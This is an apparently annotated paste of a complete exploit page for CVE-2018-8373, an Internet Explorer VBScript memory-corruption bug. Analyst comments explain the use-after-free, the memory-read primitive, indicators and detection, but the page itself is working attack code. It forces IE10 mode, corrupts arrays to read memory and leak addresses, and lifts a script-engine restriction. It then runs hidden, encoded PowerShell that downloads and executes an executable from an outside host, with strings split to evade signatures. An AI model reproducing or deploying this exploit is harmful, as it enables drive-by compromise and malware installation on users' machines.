physicaldrive0

CVE-2018-8373

Sep 26th, 2018
  1. <!doctype html>
  2. <html lang="en">
  3. <head>
  <!-- Analyst note: the x-ua-compatible meta below pins the page to IE10 document mode.
       IE11's default document mode does not execute VBScript, so forcing a legacy mode
       is what keeps the text/vbscript block in the body reachable. A legacy
       X-UA-Compatible value together with a text/vbscript script block is a useful
       static triage signal for pages of this kind. -->
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <meta http-equiv="x-ua-compatible" content="IE=10">
  <!-- The Expires / Pragma / Cache-control / Cache metas below ask the browser not to
       cache the page. For responders this means the browser cache may hold no copy of
       the page (assumption: depends on client behaviour), so proxy or network captures
       are the more reliable source. -->
  6. <meta http-equiv="Expires" content="0">
  7. <meta http-equiv="Pragma" content="no-cache">
  8. <meta http-equiv="Cache-control" content="no-cache">
  9. <meta http-equiv="Cache" content="no-cache">
  10. </head>
  11. <body>
  12. <script type="text/vbscript">
  13.  
  ' Script-level variables shared by ClassA, the helper functions and the main body.
  ' `array` is declared without bounds (dynamic; resized later with ReDim).
  ' `array2` is a fixed two-dimensional array with bounds (0, 0..6), i.e. its first
  ' dimension legitimately holds a single entry.
  14. Dim max_col
  15. Dim index_vul
  16. Dim index_a
  17. Dim index_b
  18. Dim addr
  19. Dim array()
  20. Dim array2(0,6)
  21. Dim util_mem
  22. Dim fake_array
  23. Dim fake_str
  24.  
  ' Empty class with no members. The main body creates one instance, stores it in an
  ' array slot with Set, and then reads the same slot back into `addr` as a plain value.
  25. Class Dummy
  26. End Class
  27.  
  ' ClassA: helper class whose constructor and default property both resize the
  ' script-level `array`.
  28. Class ClassA
  ' Constructor: re-dimensions the global `array` to bounds 0..2 when an instance is created.
  29. private Sub Class_Initialize
  30. ReDim array(2)
  31. 'IsEmpty(array)
  32. End Sub
  33.  
  ' Default property getter. Grows the global `array` to 0..100000 (Preserve keeps the
  ' existing elements), sets array2(0,0..6) to 3, stores array2 in every element of
  ' `array`, and returns &h0fffffff.
  ' Analyst note: the main body later runs `array(2)=cls` without Set, which presumably
  ' evaluates this default property while array(2) is the assignment target. Reallocating
  ' an array from a callback while that array is being accessed matches the use-after-free
  ' pattern the paste title (CVE-2018-8373) refers to. Inferred from code shape and title;
  ' confirm against vendor analysis.
  ' The returned &h0fffffff equals the max_col value the main body later looks for as an
  ' array dimension size.
  34. Public Default Property Get P
  35. ReDim Preserve array(100000)
  36.  
  37. For i = 0 To UBound(array2,2)
  38. array2(0,i) = 3
  39. Next
  40. For i = 0 To UBound(array)
  41. array(i) = array2
  42. Next
  43. P=&h0fffffff
  44. End Property
  45. End Class
  46.  
  ' rw_primit: stores fake_array and fake_str through array(index_vul), and after each
  ' store writes a Double through array(index_b); finally copies the slot at
  ' array(index_vul)(index_a,0) into util_mem. No return value is assigned.
  ' Analyst note: the same data is written through one index path and then overwritten
  ' through another, which only makes sense if both paths alias the same memory.
  ' NOTE(review): the tiny Double values presumably overwrite the type tag of the value
  ' just stored (type confusion); not verifiable from the page alone.
  ' The numeric literals are split with "+" so the full constant never appears as one
  ' string, which defeats naive string signatures. Detection should normalise
  ' concatenations before matching.
  47. Function rw_primit()
  48. array(index_vul)(index_a+2,0)=fake_array
  49. array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
  50.  
  51. array(index_vul)(index_a,0)=fake_str
  52. array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
  53.  
  54. util_mem=array(index_vul)(index_a,0)
  55. End Function
  56.  
  ' read: returns LenB() of the element at index util_mem+8 of the value stored in
  ' array(index_vul)(index_a+2,0). Takes no arguments; relies on the script-level state
  ' set up by rw_primit and GetUnlt32.
  57. Function read
  58. read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
  59. End Function
  60.  
  ' GetUnlt32(addr): writes addr+4 at index util_mem+8 and the value 8 at index util_mem
  ' of the value stored in array(index_vul)(index_a+2,0), calls read(), writes 3 back at
  ' index util_mem, and returns what read() produced.
  ' Analyst note: 8 and 3 are the VarType codes for String and Long. NOTE(review): this
  ' presumably retags a slot as a String pointing at addr+4 so that LenB returns the
  ' 32-bit value stored at addr, then restores the tag; in other words an arbitrary
  ' memory read built on the corrupted array. Confirm in a debugger before relying on it.
  61. Function GetUnlt32(addr)
  62. Dim value
  63. array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
  64. array(index_vul)(index_a+2,0)(util_mem)=8
  65. value=read()
  66. array(index_vul)(index_a+2,0)(util_mem)=3
  67. GetUnlt32 = value
  68. End Function
  69.  
  ' Main body, step 1. Creates a ClassA instance (its constructor runs ReDim array(2))
  ' and assigns it into array(2) without `Set`; see ClassA's default property, which
  ' resizes `array`. max_col is then set to &h0fffffff, the same value that property returns.
  70. Set cls = New ClassA
  71. array(2)=cls
  72.  
  73. IsEmpty(array)
  74.  
  75. max_col=&h0fffffff
  76.  
  77.  
  ' Scans `array` for the first element whose first dimension spans max_col entries and
  ' records its index in index_vul.
  ' Analyst note: every element was filled from array2, whose first dimension holds one
  ' entry, so a span of &h0fffffff can only come from a corrupted array descriptor. The
  ' script is checking whether the memory-safety bug took effect.
  78. For i=0 To UBound(array)
  79. If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
  80. index_vul=i
  81. Exit For
  82. End If
  83. Next
  84.  
  85.  
  86.  
  ' Main body, step 2. Walks the first dimension of array(index_vul) looking for slots
  ' whose VarType values at offsets i, i+1, i+3, i+4 are 2, 2, 3, 3 (Integer, Integer,
  ' Long, Long). On a match it sets index_a=i+3 and writes the marker string "AAAA" there.
  ' Analyst note: indexing up to &h0fffffff entries reads far outside the element's real
  ' storage. NOTE(review): the 2,2,3,3 pattern is presumably the in-memory signature of a
  ' neighbouring array2 copy; confirm.
  87. For i=0 To UBound(array(index_vul),1)
  88. Dim type1 ,type2 ,type3 ,type4
  89. type1=VarType(array(index_vul)(i,0))
  90. type2=VarType(array(index_vul)(i+1,0))
  91. type3=VarType(array(index_vul)(i+3,0))
  92. type4=VarType(array(index_vul)(i+4,0))
  93. If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
  94. index_a=i+3
  95. array(index_vul)(index_a,0)="AAAA"
  96. Exit For
  97. End If
  98. Next
  99.  
  ' Finds the first element of `array` whose (0,0) entry now equals 8 and records it as
  ' index_b. Every (0,0) entry was initialised to 3, and 8 is the VarType code for String.
  ' NOTE(review): presumably the "AAAA" write above landed in this element's storage,
  ' which identifies index_b as a second view of the same memory; confirm.
  100. For i=0 To UBound(array,1)
  101. If array(i)(0,0)=8 Then
  102. index_b=i
  103. Exit For
  104. End If
  105. next
  106.  
  107.  
  108.  
  ' Main body, step 3. Stores a Dummy object reference in slot index_a+4 of
  ' array(index_vul), writes a Double through array(index_b)(0,4), then reads the same
  ' slot back into `addr` as a plain value.
  ' NOTE(review): the author's trailing comment '3 suggests the Double retags the slot as
  ' VarType 3 (Long), so `addr` presumably receives the object's raw address. An address
  ' disclosure of this kind undermines ASLR for that object; confirm in a debugger.
  109. Set dm = New Dummy
  110. Set array(index_vul)(index_a+4,0) = dm
  111. array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
  112. addr=array(index_vul)(index_a+4,0)
  113.  
  114.  
  ' Builds two strings from %u-escaped 16-bit values with Unescape() and calls rw_primit(),
  ' which stores them through the aliased array slots.
  ' Analyst note: the %u sequences are split with "+" so no complete escape run appears
  ' in the page source. Static detection should normalise string concatenation before
  ' matching Unescape("%u....") patterns.
  115. fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
  116. fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
  117. rw_primit()
  118.  
  119.  
  ' Main body, step 4. Reads a value at addr+&hc with GetUnlt32, reads another at that
  ' value + 4 (named p_C0leScript by the author), then writes 0 through the aliased array
  ' at an index derived from p_C0leScript+&h174.
  ' NOTE(review): web content in IE is normally refused when it tries to create
  ' Shell.Application. The zero written just before CreateObject is presumably what lifts
  ' that restriction in the script engine; not verifiable from the page alone.
  120. Dim psection
  121. psection = GetUnlt32(addr+&hc)
  122. dim a
  123. a=psection+4
  124.  
  125. Dim p_C0leScript
  126. p_C0leScript=GetUnlt32(a)
  127. a=p_C0leScript+&h174
  128. array(index_vul)(index_a+2,0)(a-8)=0
  ' Payload stage. Creates Shell.Application and calls ShellExecute on powershell.exe with
  ' -WindowStyle Hidden and -encodedCommand. The ProgID and the command line are split
  ' with "+" to avoid appearing as whole strings in the page source.
  ' The Base64 argument (UTF-16LE) decodes to a System.Net.WebClient DownloadFile call
  ' followed by execution of the downloaded file. Indicators, defanged:
  '   download URL : hxxp://www[.]myswcd[.]com/vol/s1.exe
  '   dropped file : c:/windows/temp/atum2l.exe
  ' Detection: a browser process (iexplore.exe) spawning powershell.exe with a hidden
  ' window and an encoded command; PowerShell script-block or command-line logging showing
  ' DownloadFile; an executable written to and launched from C:\Windows\Temp.
  ' Match on process lineage and on the decoded command, not on the literal page text.
  ' Mitigation: install the Microsoft update for the CVE named in the paste title
  ' (CVE-2018-8373, fixed in the August 2018 security updates) and disable VBScript in
  ' Internet Explorer where it is still enabled.
  129. Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
  130. Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
  131.  
  132. </script>
  133. </body>
  134. </html>